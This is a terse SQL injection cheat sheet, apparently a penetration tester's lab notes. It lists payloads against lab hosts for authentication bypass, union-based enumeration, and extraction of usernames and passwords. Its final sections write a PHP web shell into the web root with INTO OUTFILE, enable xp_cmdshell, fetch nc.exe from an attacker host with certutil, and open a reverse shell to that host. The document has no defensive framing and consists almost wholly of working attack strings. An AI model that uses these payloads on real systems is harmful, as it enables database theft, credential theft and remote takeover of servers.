sqli
Detection
add ‘ in parameter
Auth Bypass
admin' or 1=1 LIMIT 1;#' or 1=1-- -
' or '1'='1
‘ or 1=1 --
Column Enum
http://10.11.0.22/debug.php?id=1 order by 1--
this will give error when number of coulmn exceed. so change the number to get correct columns
Union to get all data
Suppose columns are 3, below will check which column is display output
http://10.11.0.22/debug.php?id=1union all select 1, 2, 3--
Extract data through union
Suppose 2 and 3 is displayed. Now this will tell user and version of sql
http://10.11.0.22/debug.php?id=1union all select 1, user(), @@versionGet database name
http://10.11.0.22/debug.php?id=1union all select 1, schema_name, 3 from information_schema.schemataTell table name
http://10.11.0.22/debug.php?id=1union all select 1, table_name, 3 from information_schema.tablesthis will give only 1 table
to get all use
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’mysql’tell column name from users table
http://10.11.0.22/debug.php?id=1union all select 1, 2, column_name from information_schema.columns where table_name='users'Suppose there are 2 column username and password
http://10.11.0.22/debug.php?id=1union all select 1, username, password from usershttp://10.11.0.22/debug.php?id=1union all select 1, username, password from mysql.users
Code execution
Depending on OS, below will local file output
http://10.11.0.22/debug.php?id=1union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')INTO OUTFILE is used to create malicious file web root
http://10.11.0.22/debug.php?id=1union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'It might give error but file is created. Visit /backdoor.php?cmd=dir to check
Reverse shell
- Database enumeration is not usefull in some cases so do reverse shell
- Enable xp_cmdshell
- ' EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
- upload nc.exe from linux to victim
- ' EXEC xp_cmdshell 'powershell -c "certutil -urlcache -f http://192.168.119.143/nc.exe C:\Windows\Tasks\nc.exe"'--
- reverse shell
- nc -nvlp 4444
- ' EXEC xp_cmdshell 'powershell -c "C:\Windows\Tasks\nc.exe 192.168.119.143 4444 -e cmd.exe"' --
- For oracle injection
https://www.securityidiots.com/Web-Pentest/SQL-Injection/Union-based-Oracle-Injection.html